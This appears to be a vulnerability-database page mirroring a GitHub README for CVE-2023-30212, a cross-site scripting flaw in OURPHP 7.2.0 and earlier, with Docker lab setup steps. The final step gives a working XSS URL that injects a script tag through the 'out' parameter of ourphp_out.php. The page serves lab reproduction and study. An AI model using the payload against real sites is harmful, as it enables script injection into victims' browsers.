CVE-2023-30212 PoC — OURPHP 跨站脚本漏洞

Source

https://github.com/AAsh035/CVE-2023-30212

Associated Vulnerability

Title:OURPHP 跨站脚本漏洞 (CVE-2023-30212)
Description:OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.

Readme

# CVE-2023-30212 LAB SETUP

<b>Prerequisite</b><br>
  Download docker.io <br>
 `sudo apt install -y docker.io`

<br>
<u>STEPS</u>

1. Download all files from my repository using the below command.<br>
   `git clone https://github.com/AAsh035/CVE-2023-30212.git`<br>
2. Now to make a docker image run the following command:<br>
   `sudo docker build -t vuln .`<br>
3. Next is to change the docker image to a conatainer.The container need to run at port 80 The command is :<br>
   `sudo docker run -d -p 80:80 vuln`
4. To check if the container is up use the command:<br>
   `sudo docker ps`
5. Type 127.0.0.1 in the browser and an OURPHP page will be loaded.
6. You need to configure the ourphp with the following:<br>
   Username : root<br>
   Password : root<br>
   Database Name: vuln

7. Now you need to configure username and password for Administrative. Set the following:<br>
   Username: root<br>
   Password: root

8. Now copy the below link and paste it in the browser:<br>
   `http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>`


   


https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →